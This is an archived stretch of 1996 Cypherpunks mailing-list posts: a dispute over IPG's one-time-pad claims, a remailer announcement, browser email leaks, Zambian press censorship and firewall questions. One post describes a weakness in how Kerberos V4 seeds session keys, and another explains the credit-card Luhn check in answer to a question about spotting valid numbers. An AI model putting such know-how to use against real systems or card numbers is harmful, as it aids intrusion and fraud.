Gnsyv8DqHFrlbujh9cO94XE=
=JOAa
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Wed, 21 Feb 1996 16:52:38 +0800
To: t byfield <tbyfield@panix.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <v02120d05ad5033345066@DialupEudora>
Message-ID: <Pine.BSD/.3.91.960220205816.21251A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 20 Feb 1996, t byfield wrote:

> At 6:46 PM 2/20/96, IPG Sales wrote:
> 
> >Hedging, hedging, hedging - why? I did not noitice this <...>
> 
>         IPG, why don't you sit down and draw up the terms of a challenge?
> Specify:
> 
B>         * what information and/or materials IPG will release
>         * to whom it will release them and when
>         * who is or isn't elligible
>         * what you will and won't accept as "breaking your system"
>         * the arbitrating body
>         * a starting time and a deadline
>         * the award
> 
>         You'd do well to be _very_ thorough in these terms, since any
> perception that IPG was trying to throw the game would draw that much more
> fire. You'd also do well to make terms terms conform to real-world
> circumstances: for example, if someone hacking the office machines on which
> which you generate, store, and/or disseminate RNs is a practical threat to
> your product, then admit that as an acceptable part of a "break."
> 
> Ted
> 
> 

It seems to me that Cypherpunks, the mailing list of individuals, has a 
very practical solution to the argument - Derek asked for certain things 
- we agreed fully with those terms  - we will provide the complete 
set of algorithms employed - we will also provide a free demo system(s) - > 

Unlike Mr. Silvernail, we have a much simplier definition of what we mean 
by a one time pad - given a message/file of length N, where N is a finite 
practical number say less than 10 to the 1000th power, that the encrypted 
ciphertext can be any of the N to the 256th power possibile clear/plain 
text messages/files.  To prove that the IPG system does not work, all you 
have to do is to prove that is not the case - that our system, without 
artifically imposed boundary conditions will generate a subset of those 
possibilities  - that is simple and strsight forward - not 
hyperbole but action - everyone stated how simple it was to break the system,
now everyone is back paddling aa fast as they can, like Mr. Metzger and some of the other big bad cyphermouths. 

Put up or shut up - why is everyone all of a sudden backing away from 
what Derek proposed - because we proposed a two way street -  operhaps 
that is the real underlying problem - you are suddenly afraid that 
you are wrong - some of the cyphermouths want to argue 
semantics and abstract theory but no one wants to prove anything one way 
or the other - this is also my answer to Mr. Metzger - do as you like, I have 
absolutely no ability to force you to do anything, just like you have no 
ability to prove us wrong, absolutely zero ability, just talk, talk, 
and more talk - no substamce anymore - just talk - talk - we are the big 
bad wolf, doctor,  that is going to kill our patients, you have the power to 
prevent that Perry - why don't you do it? You had rather sit omn the 
sideliunes and tell everyone how great you are - you are not concerned 
about the patients like you claimed yesterday, you are only 
concerned about youself - You have the ability to try to prove us wrong - 
do it. How about some action from someone, we have two taker - now, anymore?

I do not want to argue semantics with Mr. Silvernail, or Mr. Metzger - 
they have an opinion - that does not prove them right - they are entitled 
to their opinion - but they would rather castigate us out of hand than 
prove us wrong - they want to talk, talk, talk but not do anything. It is 
obviously that both are dodging the issue, by taking their own narrow 
minded view of what is and is not the truth  - both are all talk but no 
action - a lot of bull and arbitrary  posturing, but that is all itis, pure 
unadultarated bull - .

They are afraid they may be wrong and they most assuredly are - I believe 
our offer to be fair, let us hear what Derek has to say when he gets around 
to it. 

Let Derek, Inccarth, and Adam be the aribtion committee, decide whether 
the system is fataklly flawed or not - we will accept their findings 
subject to only one caveat, that they have the intellectual honesty to 
tell the truth. I believe that since Mr. Silvernail and Mr. Metzger have 
exluded themselves, that Derek, Inccarth and Adam do have that 
intellectual honesty to tell the truth - is that weighted too much in 
IPGs favor.   

Also, let them decide and report to the other Cypherpunks, whether we 
were justified in witholding broad dissemination of certain materials -
the onlu caveat there is that they wait threee months, or until they 
break the system to make that report, and again conform to a high standard 
of intellectual honesty. 

What can be more fair than that, you own members can be the entire 
judging committee - are you afraid of the truth - if you cannot accept 
that you are. Tthat could be your only real reason fornot  facing it. I 
believe that many of you are now backtracfking because you are afraid of 
the truth - we invite whatever number you might choose to try - if some 
subset of Cyberpunks break the system, then they can publish everything -

Sigh - 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@2005.bart.nl (Senator Exon)
Date: Wed, 21 Feb 1996 10:27:27 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCE> New remailer
Message-ID: <199602202110.WAA02307@ddh.bart.nl>
MIME-Version: 1.0
Content-Type: text/plain


The Exon Remailer (remailer@remailer.nl.com) is up. It supports Type 1
(Ghio) messages and news postings. It is still in beta testing.
Comments to remailer-owner@remailer.nl.com would be appreciated.

	Grtz, 

	Senator Exon

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2i

mQCNAzEqIb0AAAEEANNdNiByrACsMnADFF4XVIaVGteITHQJ7jgYT8xis1VFXdRq
II+vpHKJv0kIuf8l1B4xMk3t/AGH2zk6BwBFXwMZutSDfhxSZ/8VHky9yZQ3Zzfy
0cLCa2rfMS456WhJpj+m1X53IHMqjghm5zosF+gKJN95+/jzSWQjxfIE5MYJAAUR
tCdTZW5hdG9yIEV4b24gPHJlbWFpbGVyQHJlbWFpbGVyLm5sLmNvbT6JAJUDBRAx
KiVIWd90FI1WkT0BAQxwA/9aPuL33L7jt7yI/nFJ/xkRsPOWFrRq0sHXemEfXe4D
3mhxeA3HKjZYlKtDN2DTXVK0IEb0lkTefV3HfbMRyHyeJ+9nf+gn6ASNifXUKWnl
JZwcWBIFA25TeQX9MqdO4WZfIV6LFPJPmNJ5yeB5X4JGNU/KihBSS9KNocduMp49
cYkAlQMFEDEqH1Qp1cio8BPPmQEBm3QEAJlWcOX0nPDg/qU2WRMs1CyVNtNBQDsH
zmvadUfULzLuiKIwfSEnyoX0m9RIgdOdpQCPHHlFqMQDijtab5+aeF3Vaa/n4uGw
lpGjvg9Zz6zNNBikywpv9spd+95HZEMvPisTaPOnVGHJRG45qgm8GTnOMZEe6qgk
voxTA4UafmY1iQCVAwUQMSoid2QjxfIE5MYJAQHDngQAtajcXiFJaS2TEwuldzHE
DP7W2UlwQnSu8RYvnO2bnLZCaAnjl5gjcY+72L6+84WAhwM5upmCsCt3XxsDJz7O
KY88Tqo/oMLItwl91npjepwktJ5SoiNuW8oXeVI1lDKaSvImYmDP7D2I7YJ+iCHE
Gnsyv8DqHFrlbujh9cO94XE=
=JOAa
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Wed, 21 Feb 1996 16:22:19 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Secure Split
In-Reply-To: <9602210251.AA16675@cti02.citenet.net>
Message-ID: <199602210322.WAA12154@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


JFA writes:
> Where can I get Secure Split?
> Apparently, it is a program to split a key in m parts, where 
> n (<m) parts could rebuild the key.
> 
> I saw that name in Nautilus manual (a pgpphone lookalike for dos).
> 
> I looked through Alta Vista and the only thing I found was a post on CP
> by somebody else looking for it, in 1994 (?)

You have to look for "secsplit". Try http://www.funet.fi/pub/crypt/old/ghost/

I think Joel McNamara has it on his home page, http://www.eskimo.com/~joelm/ 
but www.eskimo.com is S L O W.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Wed, 21 Feb 1996 16:23:22 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Public Access Obsolete.  Capitalism offers free email
In-Reply-To: <199602210305.TAA12394@infinity.c2.org>
Message-ID: <199602210325.WAA12218@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Duncan writes:
# two companies are preparing to offer free email to customers who agree
# to be barraged by ads.  Juno and Freemark will soon offer free email to all
# (Americans).

Nobody writes:
> It might be a cheap safe way to set up a remailer too...

I'd be (very pleasantly) surprised if they will let you run code on the free
email account. After all, if you could, you could install a filter like 
procmail and automatically trash most of the junk mail :}

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 21 Feb 1996 16:45:56 +0800
To: cypherpunks@toad.com
Subject: CoFR Report Site
Message-ID: <199602210356.WAA21274@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to KLP, the Council on Foreign Relations report on the 
future of US intelligence:


     http://www.tc.umn.edu/~klp/CoFR.txt (text)


and


     http://www.tc.umn.edu/~klp/CoFR.gz








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 21 Feb 1996 17:06:37 +0800
To: Mike Rose <mrose@stsci.edu>
Subject: Re: JavaScript to grab email
In-Reply-To: <9602202009.AA09881@MARIAN.SOGS.STSCI.EDU>
Message-ID: <Pine.LNX.3.91.960220231508.1494B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 20 Feb 1996, Mike Rose wrote:

> >>>>> On Tue, 20 Feb 96 14:40:30 EST, Mike Rose <mrose@stsci.edu> said:
>
> >Changing the email address known to netscape doesn't help.  Your email
> >address is in the message sent, regardless of what netscape thinks
> >your identity is.
>
> Sorry for the imprecision here.  I was referring to Netscape 2.0 on
> unix here.  Changing the email address known to netscape is
> insufficient for non-root users on unix systems, because sendmail will
> put your real address into the headers.
>

AFAIK, Netscape does not use sendmail directly to send mail, but instead
contacts a user specified SMTP server and the e-mail is sent from there.
If you set the SMTP server to a fake value, or just delete the field,
the Javascript program will not work.  Of course, you won't be able to
use Netscape mail capabilities either.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMSqdg7Zc+sv5siulAQE8wgP/X0+XRWbzrKuElg23NvRo9zejhMzMim4Y
ZZvwnffni+4DZRpO3Eu706ep6ALDL8FjPuH9g9MoYEpd/tG18DEqO7eDyG2X6nsf
p0CyULK7i81ZxOtZg7KSmgEUos+YTNippN/Kk9hIxaoLN8tWYnPUleJJzIKbcKRq
Qsoj7h2ZDR4=
=LXm2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jens Thiel <thielj@cs.bonn.edu>
Date: Wed, 21 Feb 1996 14:49:36 +0800
To: cypherpunks@toad.com
Subject: Credit card numbers
Message-ID: <312A4F73.12A8@cs.bonn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Is there something like a checksum attached to Credit Card
Numbers. Or better: Is there a way to determine for a given
number N if
  -this _might_ be a valid number
  -this can't be a valid number

Thanx,
Jens.
-- 
mailto:thielj@cs.bonn.edu
Fax: +49 228 747246
http://www.Bonn.CityNet.DE/people/jens






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 21 Feb 1996 18:36:16 +0800
To: Ed Carp <bplib@wat.hookup.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <v02120d23ad509400084e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:24 2/20/96, Ed Carp wrote:
>On Wed, 21 Feb 1996, Tim Philp wrote:
>
>>       The issue that I have not seen you address is one that has been
>> brought up by several posters to this thread. This issue has to do with
>> the fact that if you generate all of the keys (or whatever) what is to
>> stop someone from offering one of your employees a LARGE bribe to cough up
>> the keys?
>
>Not to mention GAK.  No bribe needed - just a "suit" showing up with what

The threat is mote. IPG generates the keys. Therefore, their system is
insecure from the user's point of view. This is just about as fundamental
of a security flaw as you are ever going to find. Let's not waste our time
on IPG (what a misnomer) any longer.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 21 Feb 1996 19:03:57 +0800
To: Declan McCullagh <declan@well.com>
Subject: Bravo, mostly (Re: Banned Zambian newspaper now on the Web)
In-Reply-To: <Pine.3.89.9602202013.A19576-0100000@well>
Message-ID: <Pine.ULT.3.91.960221010932.28798B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[Please forward along to fight-censorship if non-redundant]

I applaud your quick response. However, you should read more and consult
people with area expertise. At least do the five-minute AltaVista and 
DejaNews search I did; don't just trust the information that gets sent to 
you, or you're likely to be used. 

I think you're at least 95% right here, but it is worth noting that The
Post has ties to the former dictator of Zambia, who was replaced by the
more or less democratically elected Chiluba whose ouster you so
precipitously are demanding. First impressions and fast action are often
necessary, but it's not responsible to stop there. Life & death politics
isn't a toy. Chiluba is no saint, but he's no two-bit dictator, either.
I'd probably rate him a notch or two below Aristide, no worse. He's
certainly no Castro, Kim, or Idi Amin.Chiluba is pretty good by
Sub-Saharan African standards (which, unfortunately, isn't saying much). 

For informed opinion, you should start with the Association of Concerned
African Scholars: 

 http://www.prairienet.org/acas/

You might want to add Amnesty International's 1995 report on Sub-Saharan
Africa, which has some background on Zambia and Chiluba: 

 http://www.amnesty.org/Africa95/360195.AFR.txt

For those who read Swedish, this appears to be a more specific Amnesty 
report:

 http://www.everyday.se/amnesty/zambia2.html

See Chiluba's comments on Nigerian human rights violations:

 http://www.prairienet.org/acas/chiluba.html

Official statements of the Zambian government:

 http://www.zamnet.zm/zamnet/grz/govstate.html

Two trivial stylistic whines:

HTML bug:
You need to prepend mailto: to the link to fstuart@vetmed.auburn.edu

Graphical excess:
And as I'm sure you're aware, the lead graphic is a bit large for most 
browsers. It takes up the whole 13" screen I have at home.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an5877@anon.penet.fi (deadbeat)
Date: Wed, 21 Feb 1996 16:42:51 +0800
To: cypherpunks@toad.com
Subject: Kerberos vulnerability
Message-ID: <9602210339.AA22431@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

A Kerberos V4 session key is chosen by calling random() repeatedly.
THe PRNG is seeded with srandom(time.tv_usec ^ time.tv_sec ^ p ^ n++),
where p is a static integer set to getpid() ^ gethostid() on the first
call and n is a static counter.

Is there any entropy here???  Most, if not all, Kerberos servers run one
time synchronization protocol or another, which reduces the entropy to a
few bits at most.

DEADBEAT <na5877@anon.penet.fi>


-----BEGIN PGP SIGNATURE-----
Version: 2.4

iQBFAgUBMSnfhvFZTpBW/B35AQFNqgGApyXhHKIstdDvNaCuJY/fWfRZ16BvK60A
Qde5VxuTsFdZsm69rrTtGxpdyplBxso6
=jHUm
-----END PGP SIGNATURE-----
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 21 Feb 1996 20:22:24 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Bravo, mostly (Re: Banned Zambian newspaper now on the Web)
In-Reply-To: <Pine.ULT.3.91.960221010932.28798B-100000@Networking.Stanford.EDU>
Message-ID: <Pine.3.89.9602210322.A27606-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


Rich:

You assume I did little research; this assumption is incorrect. Did you
actually read the documents your search turned up, including the ones in
Swedish? 

I spent a few hours last night reading documents that Altavista found,
including the U.S. State Department's report on human rights in Zambia
under Chiluba. It says in part: 

     Police often ignore procedural requirements and engage in abusive
     and brutal behavior, including beating and at times killing criminal
     suspects and detainees... The press and other media continued to run
     afoul of legal restraints on freedom of expression and suffered
     political reprisals for expressing independent views.

I also read enough back issues of _The Post_ to get a feel for their
editorial tone, and even if they had ties to the former dictator (an
assertion you don't back up), their recent coverage of events was not
unfair, IMHO. 

I've also read three reports by the Media Institute of South Africa
(MISA), calling for sanctions and a withholding of foreign aid to Zambia
for their human rights abuses, especially of members of the media. I
agree, and I also called for pressure through foreign aid. 

You seem to be unduly critical of my report. *shrug* I don't expect
everyone to agree with me, and I suppose I should be happy that you think
I'm "95% right," whatever that means.

-Declan




On Wed, 21 Feb 1996, Rich Graves wrote:

> Date: Wed, 21 Feb 1996 01:55:01 -0800 (PST)
> From: Rich Graves <llurch@networking.stanford.edu>
> To: Declan McCullagh <declan@well.com>
> Cc: cypherpunks@toad.com
> Subject: Bravo, mostly (Re: Banned Zambian newspaper now on the Web)
> 
> [Please forward along to fight-censorship if non-redundant]
> 
> I applaud your quick response. However, you should read more and consult
> people with area expertise. At least do the five-minute AltaVista and 
> DejaNews search I did; don't just trust the information that gets sent to 
> you, or you're likely to be used. 
> 
> I think you're at least 95% right here, but it is worth noting that The
> Post has ties to the former dictator of Zambia, who was replaced by the
> more or less democratically elected Chiluba whose ouster you so
> precipitously are demanding. First impressions and fast action are often
> necessary, but it's not responsible to stop there. Life & death politics
> isn't a toy. Chiluba is no saint, but he's no two-bit dictator, either.
> I'd probably rate him a notch or two below Aristide, no worse. He's
> certainly no Castro, Kim, or Idi Amin.Chiluba is pretty good by
> Sub-Saharan African standards (which, unfortunately, isn't saying much). 
> 
> For informed opinion, you should start with the Association of Concerned
> African Scholars: 
> 
>  http://www.prairienet.org/acas/
> 
> You might want to add Amnesty International's 1995 report on Sub-Saharan
> Africa, which has some background on Zambia and Chiluba: 
> 
>  http://www.amnesty.org/Africa95/360195.AFR.txt
> 
> For those who read Swedish, this appears to be a more specific Amnesty 
> report:
> 
>  http://www.everyday.se/amnesty/zambia2.html
> 
> See Chiluba's comments on Nigerian human rights violations:
> 
>  http://www.prairienet.org/acas/chiluba.html
> 
> Official statements of the Zambian government:
> 
>  http://www.zamnet.zm/zamnet/grz/govstate.html
> 
> Two trivial stylistic whines:
> 
> HTML bug:
> You need to prepend mailto: to the link to fstuart@vetmed.auburn.edu
> 
> Graphical excess:
> And as I'm sure you're aware, the lead graphic is a bit large for most 
> browsers. It takes up the whole 13" screen I have at home.
> 
> -rich
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 17:27:36 +0800
Subject: No Subject
Message-ID: <QQadvx20116.199602210925@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 06:10 PM 2/20/96 -0600, you wrote:
>>  ** fairly remarkable coincidences.  Or is it that great minds
>>  think alike?
>
>heh, actually the Elementrix POTP sounds like plaintext-driven autokey  
>cipher and probably wouldn't be offensive if they weren't touting it as a  
>'OTP'...
>

Yes, that's true, but they also allude to "a large number of randomly
spinning dice" [rotors?] of which some are selected by contents [perhaps]
the autokey stream.  This from a discussion held with the POTP people.  The
allusion to the numerous 'dice' is what suggested to me a similarity with
the new [unknown but perfect, of course] system.  The autokey of POTP was
supposedly only part of the scheme....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 17:32:20 +0800
Subject: No Subject
Message-ID: <QQadvy20467.199602210930@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 01:00 PM 2/20/96 -0600, you wrote:
>Derek - We accept the gaunlet that Cyperpunks threw down, We will 
>provide the complete set of algoritms and free demo systems - we will not be 
>asking you to sign a NDA or anything like that, but we do want it to be a 
>two way street - if we put our head in your guillotene, to be chopped 
>off by the warlord and his minions, then we expect you to perform 
>reciprocal actions.

I'd like to go on record as being interested in looking at this.  Thanks!

>
>There has never been an idea advanced, where the orginator was not 
>thought of as a crank - Oliver Wendell Holmes Sr., "Over Teacups"
>
But not all those thought of as cranks are originators of worthwhile ideas ...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 17:34:23 +0800
Subject: No Subject
Message-ID: <QQadvy20626.199602210932@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Can't you just run a dumb TCP relay? 

I used to have one somewhere, but I can't remember if I solarified it to 
run with multi-threading. I can try and dig it up, but it'd probably be 
faster for you to rewrite from scratch. I also have a ssl proxy for the 
client side which I wrote to demo the MITM attack, but that doesn't sound 
like what you need.

Simon

On Tue, 20 Feb 1996, Lucky Green wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> I need firewall software, preferably for free and running on an x86, that
> allows me to place an SSL webserver behind the firewall.
> 
> Any pointers?
> 
> TIA,
> 
> - -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 
> 
> - ---
> [This message has been signed by an auto-signing service.  A valid signature
> means only that it has been received at the address corresponding to the
> signature and forwarded.]
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Gratis auto-signing service
> 
> iQBFAwUBMSpFICoZzwIn1bdtAQF3YgGAnt2V+2sTgv7cHDu0k3HZ/664sFbYsu9V
> 4sWnsBNuJoMRVlG4RbxE/iERpu0nR6ZF
> =kPCC
> -----END PGP SIGNATURE-----
> 
> 

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 17:40:30 +0800
Subject: No Subject
Message-ID: <QQadvy21001.199602210938@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Credit card check sums are based on the Luhn code.

Double the odd digits (1, 3, 5, etc.).  Use the sum of any 2-digit results.

Add all these numbers together to end up with one single digit.

Add this single digit to the sums of all the even digits.

The Luhn check digit is the mod 10 of that final subtotal.

For example 641205002340106 yields 4.


jwhiting




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 17:43:06 +0800
Subject: No Subject
Message-ID: <QQadvy21188.199602210941@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



	I have been following this debate with some interest. I think that
it is quite clear that without your publishing the algorithms for your
product, you have to accept our skepticism obout your claims. You have
offered to do this so I will wait to make my judgement. 
	The issue that I have not seen you address is one that has been
brought up by several posters to this thread. This issue has to do with
the fact that if you generate all of the keys (or whatever) what is to
stop someone from offering one of your employees a LARGE bribe to cough up
the keys? 
	I don't think that anyone on this list would accept as secure any
system, no matter how clever, that relies on a human factor. People are
weak, properly used, mathematics is not. To suggest that such a security
breach would not occur with your procedures is disingenuous in the
extreme. 
	I am not trying to start (or continue) a flame war. I am willing
to learn more about your system before I pass judgement but I must tell
you, however, that I have heard nothing yet to give me any confidence 
that your system is secure. 

Regards,
Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 17:45:21 +0800
Subject: No Subject
Message-ID: <QQadvy21289.199602210942@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


We now have the banned February 6 issue of _The Post_ online!

Frank Stuart kindly provided a copy of the text. I've HTMLized it, added
background documents and information about other international censorship 
efforts, and put it online at:
     http://www.cs.cmu.edu/~declan/zambia/

Zambia's president-cum-tyrant Frederick Chiluba has plenty of practice
censoring local dissidents, broadcasters, and newspapermen. Now, if he
likes, he can take on the Net. 

I've copied this message to the state news service, Zambia Today. Please
redistribute as appropriate. 

-Declan



------------------------------------------------------------------------
                http://www.cs.cmu.edu/~declan/zambia/
------------------------------------------------------------------------
   
      
                     NET CENSORSHIP AND ZAMBIAN DICTATORS
                                       
   By Declan McCullagh
   declan@well.com   
     
     
     Zambian President and Dictator-for-Life Frederick Chiluba has made a
     career of intimidating, harassing, arresting, and censoring those
     who disagree with him. Now his attempts to muzzle his critics have
     reached the Net -- specificially, Zamnet, the only Internet service
     provider in this impoverished African country.
     
     Chiluba has plenty of experience intimidating traditional media. At
     Chiluba's bidding, in December 1994 an armed paramilitary unit
     raided the Lusaka offices of The Post newspaper and its printer
     Printpak in Ndola looking for "seditious and defamatory material" --
     just as the presses were starting to roll. Germany's ambassador to
     Zambia, Peter Schmidt, who witnessed the raid, told InterPress
     Service that "the raid amounted to an attempt to intimidate the free
     press."
     
     A few days later, police arrested the top editors of the weekly
     Crime News and held them without bail and without filing charges.
     The journalists' offense? The newsweekly had revealed that Chiluba's
     wife was involved in drug trafficking.
     
     The year before, Chiluba sued The Weekly Post for libel after the
     paper reported on his shady financial dealings with South Africa.
     Chiluba also fired the head of the Zambia National Broadcasting
     Corporation for not broadcasting appropriately pro-government
     programming. In 1994, the ever-vigilant Chiluba introduced
     legislation to make the Zambian media answerable to a
     government-appointed secret tribunal with broad, undefined powers of
     censure and punishment.
     
     Chiluba's latest state-sponsored terrorism came in early February
     1996, after The Post published a report revealing the government's
     plans to hold a referendum on the adoption of a new constitution --
     plans Chilbua hoped to keep secret to the disadvantage of his
     political opponents. True to form, the hypersensitive Chiluba
     ordered his forces to invade the newspaper's office, ransack the
     paper's files, arrest the editors, and stop the presses. Security
     forces then sealed the offices of The Post.
     
     Chiluba's despotic behavior is reprehensible. Foreign governments
     immediately should yank the $1.8 billion in foreign aid Zambia
     receives each year and demand Chiluba's ouster. That failing, it's
     high time for the Zambian people to kick their thin-skinned tyrant
     out of office.

     
     February 16, 1996: Zamnet Communication Systems, which hosts the the
     web version of The Post, removes the online copy of the February 5
     issue after police threaten a raid. David Lush of the Media
     Institute of Southern Africa publishes an advisory.
     
     February 18, 1996: After reading Lush's advisory, I send an appeal
     requesting the text to several mailing lists.
     
     February 19, 1996: Frank Stuart contacts me when I'm logged into the
     WELL, saying he has a copy of the banned issue of the newspaper.
     
     February 20, 1996: This archive goes online after I translate
     Frank's text into HTML.

     
###





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 17:45:59 +0800
Subject: No Subject
Message-ID: <QQadvy21341.199602210943@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



> Date: Tue, 20 Feb 1996 14:50:00 -0600
> From: Nemesis <richier@Onramp.NET>
> To: cypherpunks@toad.com
> Subject: (no subject)

> How do i get off the mailing list??????

reply follows-------------------------------------------------------

to unsubscribe from the cypherpunks mailing list, send to:

		majordomo@toad.com

an e-mail message with the following text in the body of the message:

	unsubscribe cypherpunks richier@onramp.net

--
buenas suerte, nemesis.

p.s. -- a little hint: if your mail reader lets you save messages rec'd 
in folders or some such thing, you should save all the messages you get 
from mailing list software (like the first two messages you got from 
cypherpunks) in a sepaprate folder (like one called 'lists'.) Then you 
will be able to go back and unsubscribe or sign off when you want.

I'm thinking of putting the how to unsubscribe info for RFC-Dist and 
IETF-Announce (and maybe c.punks) in a .sig file - but I hate sigs so.
------------------------------------------------------------------------

obligatory crypto comment: has anyone looked at the iPower card and 
gotten one to play with? Where else could one get a PCMCIA card that was 
programmable and had a little memory on it? How hard would it be to make 
one - in other words, what could we get the cost down to for an 
encrypting pcmcia card? there couldn't be much to it, really, could there?
------------------------------------------------------------------
latest word from the other room: Buchanan 27%, Dole 26%, Lamar 13%




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 17:53:57 +0800
Subject: No Subject
Message-ID: <QQadvz21824.199602210951@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



I have just read your conditions for releasing the information tha the 
group felt was necessary to evaluate your product. A couple of comments.
First, the Cypherpunks are not an organized group who can agree to your 
conditions. This is simply a mailing list not a corporate entity to be 
contracted with. To attempt to treat them as such and to use their 
resources for your marketing gain is, in my opinion, less than honest. If 
the code has not been broken in 5 months, nothing will have been proved. 
A better model to follow would be that used (eventually) by Netscape. 
Release the code for comment and make changes based on weaknesses 
discovered by the group.
	My last point has to do with one of your restrictions. Why will 
you not release the information to Canadians? It cannot be ITAR, because 
it does not apply to Canadians. How can you claim that the Cypherpunks 
failed to break your system if you exclude its most brilliant members! <G>.

Regards from Canada, 
Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 17:54:56 +0800
Subject: No Subject
Message-ID: <QQadvz21866.199602210952@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Kristian Sagi wrote:
[..]
> Only 6 are connected ... Has anyone ideas, how this card works ... i 
> something like telephone card hardware tutorials or something ... I [..]

What kind of telephone card?

Probably a smart card with PK crypto which isn't so easy to defeat.

In terms of technical details, check 2600 magazine (but avoid alt.2600,
since there's more noise there than this group has) or do a web search.
You might want to check other magazines like Hac Tic (no longer printed?)
- ---
[This message has been signed by an auto-signing service.  A valid signature
